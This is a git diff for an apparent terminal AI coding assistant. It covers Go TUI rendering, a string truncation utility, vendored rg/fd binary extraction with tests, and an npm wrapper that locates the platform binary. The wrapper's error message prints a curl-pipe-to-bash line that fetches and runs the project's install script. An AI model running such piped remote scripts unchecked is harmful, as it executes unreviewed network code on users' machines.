+			CompactionSettings: compactionSettings,
+			MultiAgent:         a.multiAgent,
+		}
+		a.agent = agent.New(agentCfg, a.registry)
+		if a.multiAgent && a.agentMgr != nil {
+			a.agentMgr.Register(agent.NewAgentAdapter(a.agent))
+			a.activeAgent = agentpkg.AgentID(a.agent.ID())
+		}
+
+		// Load history messages from session if available and not yet loaded
+		a.sessionMu.Lock()
+		agentHistoryLoaded := a.agentHistoryLoaded
+		a.sessionMu.Unlock()
+		if a.session != nil && !agentHistoryLoaded {
+			a.sessionMu.Lock()
+			historyMessages := a.session.GetMessages()
+			a.sessionMu.Unlock()
+
+			if len(historyMessages) > 0 {
+				a.agent.LoadHistoryMessages(historyMessages)
+				a.sessionMu.Lock()
+				a.agentHistoryLoaded = true
+				a.sessionMu.Unlock()
+			}
+		}
+	}
+
+	ctx := context.Background()
+	a.eventCh = a.agent.Run(ctx, input)
+
+	return tea.Batch(
+		func() tea.Msg { return agentStartMsg{input: input} },
+		a.listenAgentEvents(),
+	)
+}
diff --git a/internal/tui/render.go b/internal/tui/render.go
new file mode 100644
index 0000000..cda4d5b
--- /dev/null
+++ b/internal/tui/render.go
@@ -0,0 +1,225 @@
+package tui
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/charmbracelet/lipgloss"
+)
+
+func (a *App) renderMessageAt(idx int) string {
+	for i, tr := range a.toolResults {
+		if tr.msgIndex == idx {
+			return a.renderToolResult(a.toolResults[i])
+		}
+	}
+	if _, ok := a.assistantRaw[idx]; ok {
+		return a.renderAssistantMessage(idx)
+	}
+	if idx >= 0 && idx < len(a.messages) {
+		return a.messages[idx]
+	}
+	return ""
+}
+
+func (a *App) renderToolResult(result toolResult) string {
+	if result.toolName == "edit" {
+		if result.summary == "" && result.fullContent == "" && result.diff == nil {
+			return toolStyle.Render(fmt.Sprintf("%s ...", formatToolHeader(result)))
+		}
+		return toolStyle.Render(formatEditedToolResult(result))
+	}
+	summary := result.summary
+	if summary == "" {
+		summary = "..."
+	}
+	return toolStyle.Render(fmt.Sprintf("%s %s", formatToolHeader(result), summary))
+}
+
+func (a *App) renderAssistantMessage(idx int) string {
+	raw := a.assistantRaw[idx]
+	if raw == "" {
+		return ""
+	}
+	if a.assistantDirty[idx] && a.mdRenderer != nil {
+		rendered, err := a.mdRenderer.Render(raw)
+		if err == nil {
+			a.assistantRendered[idx] = rendered
+		}
+		a.assistantDirty[idx] = false
+	}
+	prefix := assistantStyle.Render("Assistant: ")
+	if rendered, ok := a.assistantRendered[idx]; ok && rendered != "" {
+		return prefix + rendered
+	}
+	return prefix + raw
+}
+
+func (a *App) renderLiveAssistantMessage(idx int) string {
+	raw := a.assistantRaw[idx]
+	if raw == "" {
+		return ""
+	}
+	return assistantStyle.Render("Assistant: ") + wrapPlainText(raw, a.assistantMarkdownWidth())
+}
+
+func wrapPlainText(s string, width int) string {
+	if width <= 0 {
+		return s
+	}
+	var out []string
+	for _, line := range strings.Split(s, "\n") {
+		out = append(out, wrapPlainLine(line, width)...)
+	}
+	return strings.Join(out, "\n")
+}
+
+func wrapPlainLine(line string, width int) []string {
+	if lipgloss.Width(line) <= width {
+		return []string{line}
+	}
+	var lines []string
+	var current strings.Builder
+	currentWidth := 0
+	for _, r := range line {
+		rw := lipgloss.Width(string(r))
+		if currentWidth > 0 && currentWidth+rw > width {
+			lines = append(lines, current.String())
+			current.Reset()
+			currentWidth = 0
+		}
+		current.WriteRune(r)
+		currentWidth += rw
+	}
+	lines = append(lines, current.String())
+	return lines
+}
+
+func (a *App) renderPlanPanel() string {
+	if a.currentPlan == nil || len(a.currentPlan.Steps) == 0 {
+		return ""
+	}
+	var lines []string
+	title := a.currentPlan.Title
+	if title == "" {
+		title = "Plan"
+	}
+	lines = append(lines, statusStyle.Render(title))
+	for _, step := range a.currentPlan.Steps {
+		lines = append(lines, statusStyle.Render(fmt.Sprintf("%s %s", planStatusMarker(step.Status), step.Title)))
+	}
+	if a.currentPlan.Note != "" {
+		lines = append(lines, statusStyle.Render("note: "+a.currentPlan.Note))
+	}
+	return strings.Join(lines, "\n")
+}
+
+// formatCachePercent calculates and returns the cache hit rate string, or empty string if no data.
+// The denominator uses the full input footprint so OpenAI and Anthropic can share the same
+// cache ratio display after their provider-specific usage fields are normalized.
+func (a *App) formatCachePercent() string {
+	switch {
+	case a.totalInputTokens > 0:
+		pct := float64(a.totalCacheRead) / float64(a.totalInputTokens) * 100
+		if pct > 100 {
+			pct = 100
+		}
+		return fmt.Sprintf("Cache: %.0f%%", pct)
+	case a.totalCacheRead > 0:
+		return fmt.Sprintf("CacheRead: %d", a.totalCacheRead)
+	case a.totalCacheWrite > 0:
+		return fmt.Sprintf("CacheWrite: %d", a.totalCacheWrite)
+	default:
+		return ""
+	}
+}
+
+func formatTokens(count int) string {
+	if count < 1000 {
+		return fmt.Sprintf("%d", count)
+	}
+	if count < 10000 {
+		return fmt.Sprintf("%.1fk", float64(count)/1000)
+	}
+	if count < 1000000 {
+		return fmt.Sprintf("%dk", count/1000)
+	}
+	if count < 10000000 {
+		return fmt.Sprintf("%.1fM", float64(count)/1000000)
+	}
+	return fmt.Sprintf("%dM", count/1000000)
+}
+
+func (a *App) renderFooter() string {
+	modelName := "unknown"
+	if a.model != nil {
+		modelName = a.model.Name
+	}
+
+	var modeStr string
+	switch a.mode {
+	case "plan":
+		modeStr = "🗒 PLAN"
+	case "agent":
+		modeStr = "🔧 AGENT"
+	case "yolo":
+		modeStr = "🚀 YOLO"
+	default:
+		modeStr = strings.ToUpper(a.mode)
+	}
+
+	cwd := "."
+	if a.session != nil && a.session.GetHeader() != nil {
+		cwd = a.session.GetHeader().Cwd
+	}
+	if len(cwd) > 30 {
+		cwd = "..." + cwd[len(cwd)-27:]
+	}
+
+	// Build context usage string with color coding
+	contextStr := ""
+	if a.contextUsage != nil && a.contextUsage.ContextWindow > 0 {
+		if a.contextUsage.Percent != nil {
+			percent := *a.contextUsage.Percent
+			contextDisplay := fmt.Sprintf("%.1f%%/%s",
+				percent,
+				formatTokens(a.contextUsage.ContextWindow))
+			// Colorize based on usage
+			if percent > 90 {
+				contextStr = " | " + errorStyle.Render(contextDisplay)
+			} else if percent > 70 {
+				contextStr = " | " + userStyle.Render(contextDisplay)
+			} else {
+				contextStr = " | " + contextDisplay
+			}
+		} else {
+			contextStr = fmt.Sprintf(" | ?/%s", formatTokens(a.contextUsage.ContextWindow))
+		}
+	}
+
+	// Build cache hit rate string, highlighting when hit rate >= 50%
+	cacheStr := ""
+	if cachePercentStr := a.formatCachePercent(); cachePercentStr != "" {
+		if a.totalInputTokens > 0 && float64(a.totalCacheRead)/float64(a.totalInputTokens)*100 >= 50 {
+			cacheStr = " | " + statusStyle.Render(cachePercentStr)
+		} else {
+			cacheStr = " | " + cachePercentStr
+		}
+	}
+
+	status := fmt.Sprintf(" %s | %s | %s%s%s", modeStr, modelName, cwd, contextStr, cacheStr)
+	if a.isThinking {
+		status += " | " + spinnerChars[a.spinnerIndex] + " " + formatDuration(a.timer.Elapsed())
+	} else {
+		if a.lastDuration > 0 {
+			status += " | last " + formatDuration(a.lastDuration)
+		}
+		if a.toolModalOpen {
+			status += " | Esc/Ctrl+O:close PgUp/PgDn Up/Down:scroll"
+		} else {
+			status += " | Tab:mode Esc:abort Ctrl+O:details"
+		}
+	}
+
+	return footerStyle.Width(a.width).Render(status)
+}
diff --git a/internal/tui/tool_modal.go b/internal/tui/tool_modal.go
new file mode 100644
index 0000000..774d9ad
--- /dev/null
+++ b/internal/tui/tool_modal.go
@@ -0,0 +1,138 @@
+package tui
+
+import (
+	"fmt"
+	"strings"
+)
+
+func (a *App) openLatestToolModal() {
+	a.toolModalOpen = true
+	a.toolModalPinnedBottom = true
+	a.toolModalOffset = a.maxToolModalOffset()
+}
+
+func (a *App) closeToolModal() {
+	a.toolModalOpen = false
+	a.toolModalOffset = 0
+	a.toolModalPinnedBottom = false
+}
+
+func formatToolModalContent(result toolResult) string {
+	var parts []string
+	if result.toolArgs != nil {
+		if args := formatToolArgs(result.toolName, result.toolArgs); strings.TrimSpace(args) != "" {
+			parts = append(parts, args)
+		}
+	}
+	if result.fullContent != "" {
+		parts = append(parts, "---", result.fullContent)
+	}
+	if result.diff != nil && result.diff.Unified != "" {
+		parts = append(parts, "--- diff", result.diff.Unified)
+	}
+	if len(parts) == 0 {
+		return "(no output)"
+	}
+	return strings.Join(parts, "\n")
+}
+
+func (a *App) renderExpandedTranscript() string {
+	var parts []string
+	for i := range a.messages {
+		msg := a.renderExpandedMessageAt(i)
+		if strings.TrimSpace(msg) != "" {
+			parts = append(parts, msg)
+		}
+	}
+	if len(parts) == 0 {
+		return "(no conversation yet)"
+	}
+	return strings.Join(parts, "\n\n")
+}
+
+func (a *App) renderExpandedMessageAt(idx int) string {
+	for i, tr := range a.toolResults {
+		if tr.msgIndex == idx {
+			return a.renderExpandedToolResult(a.toolResults[i])
+		}
+	}
+	if _, ok := a.assistantRaw[idx]; ok {
+		return a.renderAssistantMessage(idx)
+	}
+	if idx >= 0 && idx < len(a.messages) {
+		return a.messages[idx]
+	}
+	return ""
+}
+
+func (a *App) renderExpandedToolResult(result toolResult) string {
+	content := formatToolHeader(result)
+	if result.toolName == "edit" {
+		content = formatEditedToolResult(result)
+	}
+	details := formatToolModalContent(result)
+	if strings.TrimSpace(details) != "" {
+		content += "\n" + details
+	}
+	return toolStyle.Render(content)
+}
+
+func (a *App) renderToolModal() string {
+	width := a.width - 4
+	if width < 20 {
+		width = 20
+	}
+	height := a.toolModalPageSize()
+	contentText := a.renderExpandedTranscript()
+	lines := strings.Split(contentText, "\n")
+	maxOffset := a.maxToolModalOffset()
+	if a.toolModalPinnedBottom {
+		a.toolModalOffset = maxOffset
+	}
+	if a.toolModalOffset > maxOffset {
+		a.toolModalOffset = maxOffset
+	}
+	end := a.toolModalOffset + height
+	if end > len(lines) {
+		end = len(lines)
+	}
+	visible := strings.Join(lines[a.toolModalOffset:end], "\n")
+	if visible == "" {
+		visible = " "
+	}
+	position := fmt.Sprintf("lines %d-%d/%d", a.toolModalOffset+1, end, len(lines))
+	if len(lines) == 0 {
+		position = "lines 0-0/0"
+	}
+	title := fmt.Sprintf("Expanded transcript  %s  PgUp/PgDn Up/Down Esc", position)
+	content := title + "\n" + strings.Repeat("─", minInt(width-2, len(title))) + "\n" + visible
+	return toolModalStyle.Width(width).Height(height + 3).Render(content)
+}
+
+func (a *App) scrollToolModal(delta int) {
+	a.toolModalOffset += delta
+	if a.toolModalOffset < 0 {
+		a.toolModalOffset = 0
+	}
+	if maxOffset := a.maxToolModalOffset(); a.toolModalOffset > maxOffset {
+		a.toolModalOffset = maxOffset
+	}
+	a.toolModalPinnedBottom = a.toolModalOffset == a.maxToolModalOffset()
+}
+
+func (a *App) toolModalPageSize() int {
+	pageSize := a.height - 6
+	if pageSize < 3 {
+		return 3
+	}
+	return pageSize
+}
+
+func (a *App) maxToolModalOffset() int {
+	lines := strings.Split(a.renderExpandedTranscript(), "\n")
+	maxOffset := len(lines) - a.toolModalPageSize()
+	if maxOffset < 0 {
+		return 0
+	}
+	return maxOffset
+}
diff --git a/internal/util/truncate.go b/internal/util/truncate.go
new file mode 100644
index 0000000..2b59e32
--- /dev/null
+++ b/internal/util/truncate.go
@@ -0,0 +1,30 @@
+package util
+
+// TruncateString returns a valid UTF-8 prefix of s whose byte length is at most maxBytes.
+func TruncateString(s string, maxBytes int) string {
+	if maxBytes <= 0 {
+		return ""
+	}
+	if len(s) <= maxBytes {
+		return s
+	}
+	end := 0
+	for idx := range s {
+		if idx > maxBytes {
+			break
+		}
+		end = idx
+	}
+	if end == 0 {
+		return ""
+	}
+	return s[:end]
+}
+
+// TruncateWithSuffix truncates s with TruncateString and appends suffix when truncation occurs.
+func TruncateWithSuffix(s string, maxBytes int, suffix string) string {
+	if len(s) <= maxBytes {
+		return s
+	}
+	return TruncateString(s, maxBytes) + suffix
+}
diff --git a/internal/util/truncate_test.go b/internal/util/truncate_test.go
new file mode 100644
index 0000000..9582516
--- /dev/null
+++ b/internal/util/truncate_test.go
@@ -0,0 +1,27 @@
+package util
+
+import (
+	"strings"
+	"testing"
+	"unicode/utf8"
+)
+
+func TestTruncateStringKeepsValidUTF8(t *testing.T) {
+	got := TruncateString("你好世界", 5)
+	if !utf8.ValidString(got) {
+		t.Fatalf("invalid UTF-8: %q", got)
+	}
+	if got != "你" {
+		t.Fatalf("got %q, want 你", got)
+	}
+}
+
+func TestTruncateWithSuffix(t *testing.T) {
+	got := TruncateWithSuffix("hello world", 5, "...")
+	if got != "hello..." {
+		t.Fatalf("got %q, want hello...", got)
+	}
+	if strings.ContainsRune(TruncateWithSuffix("🙂🙂", 5, "..."), utf8.RuneError) {
+		t.Fatal("truncated string contains replacement rune")
+	}
+}
diff --git a/internal/vendored/embed_unsupported.go b/internal/vendored/embed_unsupported.go
new file mode 100644
index 0000000..a3e7aa8
--- /dev/null
+++ b/internal/vendored/embed_unsupported.go
@@ -0,0 +1,6 @@
+//go:build !((linux && (amd64 || arm64)) || (darwin && (amd64 || arm64)) || (windows && (amd64 || arm64)))
+
+package vendored
+
+var rgData []byte
+var fdData []byte
diff --git a/internal/vendored/vendored.go b/internal/vendored/vendored.go
index 55a5018..d3d2877 100644
--- a/internal/vendored/vendored.go
+++ b/internal/vendored/vendored.go
@@ -1,6 +1,7 @@
 package vendored
 
 import (
+	"errors"
 	"fmt"
 	"os"
 	"path/filepath"
@@ -10,6 +11,14 @@ import (
 // rgData 和 fdData 由各平台的 embed_*.go 文件定义
 // 通过 go:embed 嵌入对应的二进制数据
 
+// ErrUnsupportedPlatform indicates that rg/fd are not embedded for this target.
+var ErrUnsupportedPlatform = errors.New("vendored rg/fd unsupported for current platform")
+
+// HasEmbeddedTools reports whether the current target has embedded rg/fd data.
+func HasEmbeddedTools() bool {
+	return len(rgData) > 0 && len(fdData) > 0
+}
+
 // binDir 返回 ~/.vibecoding/bin/ 目录路径
 func binDir() (string, error) {
 	home, err := os.UserHomeDir()
@@ -22,6 +31,10 @@ func binDir() (string, error) {
 // Ensure 确保 rg 和 fd 已解压到 ~/.vibecoding/bin/
 // 首次运行时从嵌入数据写入，后续跳过
 func Ensure() error {
+	if !HasEmbeddedTools() {
+		return fmt.Errorf("%w: %s-%s", ErrUnsupportedPlatform, runtime.GOOS, runtime.GOARCH)
+	}
+
 	dir, err := binDir()
 	if err != nil {
 		return err
@@ -87,6 +100,12 @@ func extractBinary(dest string, data []byte) error {
 	// 检查是否已存在
 	if info, err := os.Stat(dest); err == nil {
 		if info.Size() == int64(len(data)) {
+			// 确保已有文件可执行，避免 fork/exec permission denied。
+			if info.Mode()&0o111 == 0 {
+				if chmodErr := os.Chmod(dest, 0o755); chmodErr != nil {
+					return fmt.Errorf("设置 %s 可执行权限失败: %w", dest, chmodErr)
+				}
+			}
 			return nil // 已存在且大小一致，跳过
 		}
 	}
diff --git a/internal/vendored/vendored_test.go b/internal/vendored/vendored_test.go
new file mode 100644
index 0000000..610bdae
--- /dev/null
+++ b/internal/vendored/vendored_test.go
@@ -0,0 +1,232 @@
+package vendored
+
+import (
+	"os"
+	"path/filepath"
+	"runtime"
+	"testing"
+)
+
+// withTempHome sets HOME (or USERPROFILE on Windows) to a temp dir for the
+// duration of the test so that binDir() / Ensure() / RgPath() / FdPath()
+// don't touch the real ~/.vibecoding/bin/.
+func withTempHome(t *testing.T) string {
+	t.Helper()
+	dir := t.TempDir()
+	if runtime.GOOS == "windows" {
+		t.Setenv("USERPROFILE", dir)
+	} else {
+		t.Setenv("HOME", dir)
+	}
+	return dir
+}
+
+// --- binDir ---
+
+func TestBinDir(t *testing.T) {
+	home := withTempHome(t)
+	dir, err := binDir()
+	if err != nil {
+		t.Fatalf("binDir: %v", err)
+	}
+	want := filepath.Join(home, ".vibecoding", "bin")
+	if dir != want {
+		t.Errorf("binDir = %q, want %q", dir, want)
+	}
+}
+
+// --- extractBinary ---
+
+func TestExtractBinary_EmptyData(t *testing.T) {
+	dest := filepath.Join(t.TempDir(), "empty")
+	err := extractBinary(dest, nil)
+	if err == nil {
+		t.Fatal("expected error for empty data")
+	}
+}
+
+func TestExtractBinary_WritesNew(t *testing.T) {
+	dest := filepath.Join(t.TempDir(), "bin")
+	data := []byte("#!/bin/sh\necho hello\n")
+	if err := extractBinary(dest, data); err != nil {
+		t.Fatalf("extractBinary: %v", err)
+	}
+	// Verify file written
+	info, err := os.Stat(dest)
+	if err != nil {
+		t.Fatalf("stat: %v", err)
+	}
+	if info.Size() != int64(len(data)) {
+		t.Errorf("size = %d, want %d", info.Size(), len(data))
+	}
+	// Verify executable
+	if runtime.GOOS != "windows" {
+		if info.Mode()&0o111 == 0 {
+			t.Error("file should be executable")
+		}
+	}
+}
+
+func TestExtractBinary_SkipsSameSize(t *testing.T) {
+	dir := t.TempDir()
+	dest := filepath.Join(dir, "bin")
+	data := []byte("hello")
+
+	// First write
+	if err := extractBinary(dest, data); err != nil {
+		t.Fatalf("first write: %v", err)
+	}
+	info1, _ := os.Stat(dest)
+	modTime1 := info1.ModTime()
+
+	// Second write — should skip (same size)
+	if err := extractBinary(dest, data); err != nil {
+		t.Fatalf("second write: %v", err)
+	}
+	info2, _ := os.Stat(dest)
+	if info2.ModTime() != modTime1 {
+		t.Error("file should not be rewritten when size matches")
+	}
+}
+
+func TestExtractBinary_RewritesDifferentSize(t *testing.T) {
+	dir := t.TempDir()
+	dest := filepath.Join(dir, "bin")
+
+	// Write v1
+	if err := extractBinary(dest, []byte("v1")); err != nil {
+		t.Fatalf("v1: %v", err)
+	}
+	// Write v2 (different size)
+	v2 := []byte("version2")
+	if err := extractBinary(dest, v2); err != nil {
+		t.Fatalf("v2: %v", err)
+	}
+	got, _ := os.ReadFile(dest)
+	if string(got) != string(v2) {
+		t.Errorf("content = %q, want %q", got, v2)
+	}
+}
+
+func TestExtractBinary_FixesPermissions(t *testing.T) {
+	if runtime.GOOS == "windows" {
+		t.Skip("permission test not applicable on Windows")
+	}
+	dir := t.TempDir()
+	dest := filepath.Join(dir, "bin")
+	data := []byte("test")
+
+	// Write file without execute permission
+	os.WriteFile(dest, data, 0o644)
+
+	// extractBinary should fix permissions
+	if err := extractBinary(dest, data); err != nil {
+		t.Fatalf("extractBinary: %v", err)
+	}
+	info, _ := os.Stat(dest)
+	if info.Mode()&0o111 == 0 {
+		t.Error("extractBinary should fix execute permission")
+	}
+}
+
+// --- RgPath / FdPath ---
+
+func TestRgPath(t *testing.T) {
+	home := withTempHome(t)
+	path := RgPath()
+	if path == "" {
+		t.Fatal("RgPath returned empty")
+	}
+	ext := ""
+	if runtime.GOOS == "windows" {
+		ext = ".exe"
+	}
+	want := filepath.Join(home, ".vibecoding", "bin", "rg"+ext)
+	if path != want {
+		t.Errorf("RgPath = %q, want %q", path, want)
+	}
+}
+
+func TestFdPath(t *testing.T) {
+	home := withTempHome(t)
+	path := FdPath()
+	if path == "" {
+		t.Fatal("FdPath returned empty")
+	}
+	ext := ""
+	if runtime.GOOS == "windows" {
+		ext = ".exe"
+	}
+	want := filepath.Join(home, ".vibecoding", "bin", "fd"+ext)
+	if path != want {
+		t.Errorf("FdPath = %q, want %q", path, want)
+	}
+}
+
+// --- Ensure ---
+
+func TestEnsure(t *testing.T) {
+	if !HasEmbeddedTools() {
+		t.Skip("vendored rg/fd are not embedded for this platform")
+	}
+
+	withTempHome(t)
+
+	if err := Ensure(); err != nil {
+		t.Fatalf("Ensure: %v", err)
+	}
+
+	// Verify both binaries exist
+	rgPath := RgPath()
+	fdPath := FdPath()
+
+	rgInfo, err := os.Stat(rgPath)
+	if err != nil {
+		t.Fatalf("rg not found at %s: %v", rgPath, err)
+	}
+	if rgInfo.Size() == 0 {
+		t.Error("rg binary is empty")
+	}
+
+	fdInfo, err := os.Stat(fdPath)
+	if err != nil {
+		t.Fatalf("fd not found at %s: %v", fdPath, err)
+	}
+	if fdInfo.Size() == 0 {
+		t.Error("fd binary is empty")
+	}
+
+	// Verify executable
+	if runtime.GOOS != "windows" {
+		if rgInfo.Mode()&0o111 == 0 {
+			t.Error("rg should be executable")
+		}
+		if fdInfo.Mode()&0o111 == 0 {
+			t.Error("fd should be executable")
+		}
+	}
+}
+
+func TestEnsure_Idempotent(t *testing.T) {
+	if !HasEmbeddedTools() {
+		t.Skip("vendored rg/fd are not embedded for this platform")
+	}
+
+	withTempHome(t)
+
+	// First call
+	if err := Ensure(); err != nil {
+		t.Fatalf("first Ensure: %v", err)
+	}
+	info1, _ := os.Stat(RgPath())
+
+	// Second call — should skip (idempotent)
+	if err := Ensure(); err != nil {
+		t.Fatalf("second Ensure: %v", err)
+	}
+	info2, _ := os.Stat(RgPath())
+
+	if info2.ModTime() != info1.ModTime() {
+		t.Error("Ensure should be idempotent (no rewrite on second call)")
+	}
+}
diff --git a/npm/.npmignore b/npm/.npmignore
index 50d71d5..d8cb2f8 100644
--- a/npm/.npmignore
+++ b/npm/.npmignore
@@ -1,15 +1,5 @@
-# Ignore everything
-*
-
-# Except these files
-!package.json
-!postinstall.js
-!index.js
-!README.md
-
-# Ignore generated files
-tgz
+# Package contents are controlled by package.json "files".
 *.tgz
 
-# Ignore platform packages directory (published as separate packages)
+# Platform packages are published separately.
 packages/
diff --git a/npm/bin/vibecoding b/npm/bin/vibecoding
new file mode 100755
index 0000000..7eed5e2
--- /dev/null
+++ b/npm/bin/vibecoding
@@ -0,0 +1,126 @@
+#!/usr/bin/env node
+
+// Wrapper script that resolves and executes the platform-specific binary.
+// When installed via `npm i -g vibecoding-installer`, this script finds the
+// correct binary from the platform-specific optional dependency package.
+
+const { execFileSync } = require('child_process');
+const path = require('path');
+const fs = require('fs');
+
+// Map npm os/cpu to package name
+const PLATFORM_MAP = {
+  'linux-x64-glibc': 'vibecoding-installer-linux-x64',
+  'linux-arm64-glibc': 'vibecoding-installer-linux-arm64',
+  'linux-loong64-glibc': 'vibecoding-installer-linux-loong64',
+  'linux-x64-musl': 'vibecoding-installer-linux-musl-x64',
+  'darwin-x64': 'vibecoding-installer-darwin-x64',
+  'darwin-arm64': 'vibecoding-installer-darwin-arm64',
+  'win32-x64': 'vibecoding-installer-win32-x64',
+  'win32-arm64': 'vibecoding-installer-win32-arm64',
+};
+
+function detectPlatform() {
+  const os = process.platform;   // 'linux', 'darwin', 'win32'
+  const arch = process.arch;     // 'x64', 'arm64'
+
+  if (os === 'linux') {
+    // Detect libc: musl or glibc
+    const isMusl = (() => {
+      try {
+        // Check for Alpine's musl
+        if (fs.existsSync('/etc/alpine-release')) return true;
+        // Check ldd output for musl
+        const { execSync } = require('child_process');
+        const output = execSync('ldd --version 2>&1 || true', { encoding: 'utf8' });
+        return output.includes('musl');
+      } catch {
+        return false;
+      }
+    })();
+
+    return `${os}-${arch}-${isMusl ? 'musl' : 'glibc'}`;
+  }
+
+  return `${os}-${arch}`;
+}
+
+function findBinary() {
+  const platform = detectPlatform();
+  const packageName = PLATFORM_MAP[platform];
+
+  if (!packageName) {
+    console.error(`Unsupported platform: ${platform}`);
+    console.error(`Supported platforms: ${Object.keys(PLATFORM_MAP).join(', ')}`);
+    process.exit(1);
+  }
+
+  const searchDirs = [];
+  const addSearchDir = (dir) => {
+    if (dir && !searchDirs.includes(dir)) {
+      searchDirs.push(dir);
+    }
+  };
+
+  try {
+    addSearchDir(path.dirname(require.resolve(`${packageName}/package.json`)));
+  } catch {
+    // Keep explicit fallbacks below for unusual npm layouts.
+  }
+
+  // npm usually installs dependencies under this package. Some global installs
+  // or package managers may hoist them as siblings, so check both layouts.
+  addSearchDir(path.join(__dirname, '..', 'node_modules', packageName));
+  addSearchDir(path.join(__dirname, '..', '..', packageName));
+
+  for (const pkgDir of searchDirs) {
+    const binName = process.platform === 'win32' ? 'vibecoding.exe' : 'vibecoding';
+    const binPath = path.join(pkgDir, 'bin', binName);
+
+    if (fs.existsSync(binPath)) {
+      return binPath;
+    }
+  }
+
+  // Fallback: check if there's a binary directly in the main package's bin/
+  // (old single-package layout, or development mode)
+  const fallbackBinName = (() => {
+    const suffix = process.platform === 'win32' ? '.exe' : '';
+    const osMap = { linux: 'linux', darwin: 'darwin', win32: 'windows' };
+    const archMap = { x64: 'amd64', arm64: 'arm64', loong64: 'loong64' };
+    return `vibecoding-${osMap[process.platform]}-${archMap[process.arch]}${suffix}`;
+  })();
+
+  const fallbackPath = path.join(__dirname, fallbackBinName);
+  if (fs.existsSync(fallbackPath)) {
+    return fallbackPath;
+  }
+
+  console.error(`Could not find VibeCoding binary for platform: ${detectPlatform()}`);
+  console.error(`Searched for package: ${packageName}`);
+  console.error(`Searched in: ${searchDirs.join(', ')}`);
+  console.error('');
+  console.error('If you installed globally, try reinstalling:');
+  console.error('  npm install -g vibecoding-installer');
+  console.error('');
+  console.error('If the problem persists, install via one-line script instead:');
+  console.error('  curl -fsSL https://raw.githubusercontent.com/startvibecoding/vibecoding/main/install.sh | bash');
+  process.exit(1);
+}
+
+// Main
+const binaryPath = findBinary();
+const args = process.argv.slice(2);
+
+try {
+  execFileSync(binaryPath, args, { stdio: 'inherit' });
+} catch (err) {
+  // Forward the exit code
+  if (err.status !== undefined) {
+    process.exit(err.status);
+  }
+  if (err.code) {
+    process.exit(1);
+  }
+  process.exit(1);
+}
diff --git a/npm/index.js b/npm/index.js
deleted file mode 100644
index 6caefe6..0000000
--- a/npm/index.js
+++ /dev/null
@@ -1,31 +0,0 @@
-#!/usr/bin/env node
-
-const { platform, arch } = require('os');
-const fs = require('fs');
-const path = require('path');
-
-// Platform/arch mapping to npm package name
-const PLATFORM_PACKAGES = {
-  'linux-x64':    'vibecoding-installer-linux-x64',
-  'linux-arm64':  'vibecoding-installer-linux-arm64',
-  'darwin-x64':   'vibecoding-installer-darwin-x64',
-  'darwin-arm64': 'vibecoding-installer-darwin-arm64',
-  'win32-x64':    'vibecoding-installer-win32-x64',
-  'win32-arm64':  'vibecoding-installer-win32-arm64',
-};
-
-const key = `${platform()}-${arch()}`;
-const pkgName = PLATFORM_PACKAGES[key];
-
-if (!pkgName) {
-  throw new Error(
-    `Unsupported platform: ${key}\n` +
-    `Supported: ${Object.keys(PLATFORM_PACKAGES).join(', ')}`
-  );
-}
-
-const isWindows = platform() === 'win32';
-const binaryName = isWindows ? 'vibecoding.exe' : 'vibecoding';
-const binPath = path.join(path.dirname(require.resolve(pkgName)), 'bin', binaryName);
-
-module.exports = binPath;
diff --git a/npm/package.json b/npm/package.json
index 270c730..784bae3 100644
--- a/npm/package.json
+++ b/npm/package.json
@@ -1,14 +1,14 @@
 {
   "name": "vibecoding-installer",
-  "version": "v0.1.12-1-gf35b555-dirty",
+  "version": "0.1.32",
   "description": "AI coding assistant for the terminal",
-  "main": "index.js",
   "bin": {
     "vibecoding": "bin/vibecoding"
   },
-  "scripts": {
-    "postinstall": "node postinstall.js"
-  },
+  "files": [
+    "bin/",
+    "README.md"
+  ],
   "keywords": [
     "ai",
     "coding",
@@ -30,12 +30,13 @@
     "node": ">=14"
   },
   "optionalDependencies": {
-    "vibecoding-installer-linux-x64": "v0.1.12-1-gf35b555-dirty",
-    "vibecoding-installer-linux-arm64": "v0.1.12-1-gf35b555-dirty",
-    "vibecoding-installer-linux-musl-x64": "v0.1.12-1-gf35b555-dirty",
-    "vibecoding-installer-darwin-x64": "v0.1.12-1-gf35b555-dirty",
-    "vibecoding-installer-darwin-arm64": "v0.1.12-1-gf35b555-dirty",
-    "vibecoding-installer-win32-x64": "v0.1.12-1-gf35b555-dirty",
-    "vibecoding-installer-win32-arm64": "v0.1.12-1-gf35b555-dirty"
+    "vibecoding-installer-linux-x64": "0.1.32",
+    "vibecoding-installer-linux-arm64": "0.1.32",
+    "vibecoding-installer-linux-loong64": "0.1.32",
+    "vibecoding-installer-linux-musl-x64": "0.1.32",
+    "vibecoding-installer-darwin-x64": "0.1.32",
+    "vibecoding-installer-darwin-arm64": "0.1.32",
+    "vibecoding-installer-win32-x64": "0.1.32",
+    "vibecoding-installer-win32-arm64": "0.1.32"
   }
 }
diff --git a/npm/packages/vibecoding-installer-darwin-arm64/package.json b/npm/packages/vibecoding-installer-darwin-arm64/package.json
index f0d84a7..89936aa 100644
--- a/npm/packages/vibecoding-installer-darwin-arm64/package.json
+++ b/npm/packages/vibecoding-installer-darwin-arm64/package.json
@@ -1,6 +1,6 @@
 {
   "name": "vibecoding-installer-darwin-arm64",
-  "version": "v0.1.12-1-gf35b555-dirty",
+  "version": "0.1.32",
   "description": "VibeCoding native binary for darwin-arm64",
   "os": ["darwin"],
   "cpu": ["arm64"],
diff --git a/npm/packages/vibecoding-installer-darwin-x64/package.json b/npm/packages/vibecoding-installer-darwin-x64/package.json
index 5e5b5aa..bde8257 100644
--- a/npm/packages/vibecoding-installer-darwin-x64/package.json
+++ b/npm/packages/vibecoding-installer-darwin-x64/package.json
@@ -1,6 +1,6 @@
 {
   "name": "vibecoding-installer-darwin-x64",
-  "version": "v0.1.12-1-gf35b555-dirty",
+  "version": "0.1.32",
   "description": "VibeCoding native binary for darwin-x64",
   "os": ["darwin"],
   "cpu": ["x64"],
diff --git a/npm/packages/vibecoding-installer-linux-arm64/package.json b/npm/packages/vibecoding-installer-linux-arm64/package.json
index 17bb7c2..8e9cabc 100644
--- a/npm/packages/vibecoding-installer-linux-arm64/package.json
+++ b/npm/packages/vibecoding-installer-linux-arm64/package.json
@@ -1,6 +1,6 @@
 {
   "name": "vibecoding-installer-linux-arm64",
-  "version": "v0.1.12-1-gf35b555-dirty",
+  "version": "0.1.32",
   "description": "VibeCoding native binary for linux-arm64",
   "os": ["linux"],
   "cpu": ["arm64"],
diff --git a/npm/packages/vibecoding-installer-linux-loong64/package.json b/npm/packages/vibecoding-installer-linux-loong64/package.json
